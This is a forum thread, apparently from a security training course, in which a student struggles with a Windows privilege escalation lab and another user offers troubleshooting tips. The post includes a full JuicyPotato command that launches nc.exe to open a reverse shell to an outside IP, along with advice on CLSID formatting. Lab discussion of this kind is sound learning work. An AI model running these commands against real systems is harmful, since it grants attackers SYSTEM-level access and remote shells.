Windows Privilege Escalation Assessment Pt.1 Assistance

Hello,

I have probably spent 4-5 days now on escalating privileges to administrator. My understanding of the assessment is to use JuicyPotato, PrintSpoofer, RottenPotato, etc. However, no matter what I try, with different combinations of commands, nothing seems to work for me. I have looked into all the discussion pages, and even trying what has already been suggested does not seem to work. I get to the part where I am on the server as the default IIS apppool/defaultapppool user with a PowerShell instance but cannot seem to get Juicy Potato to work. Here is the command I’ve tried with PowerShell, but it does not work for me:
.\JP.exe -l 53375 -p C:\Windows\System32\cmd.exe -a "/c .\nc.exe 10.10.14.72 9999 -e cmd.exe" -t * -c 7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381

I always end up receiving the error: “COM → recv failed with error: 10038”. I have tried this command in many different orders according to all the discussions posted here, but nothing ever works. I have tried all the CLSIDs posted here as well.

Could someone point me in the right direction or private message me?

I gave up on trying to get an nc shell from JuicyPotato. Rather, I run one SYSTEM level command at a time.

I used port 1337 like an earlier module stated; not sure how much that matters. With your command, rather than trying to run nc.exe, try a different command to grab the flag.txt file from the restricted location and place it in a more accessible location on the server. Also, the CLSID should be formatted like “{xxxxxx}”. Try some CLSIDs for the correct OS from the list on the OHPE GitHub repo.

Not sure if this is the best way to do the lab, but after many hours, this worked for me so I’m sticking with it.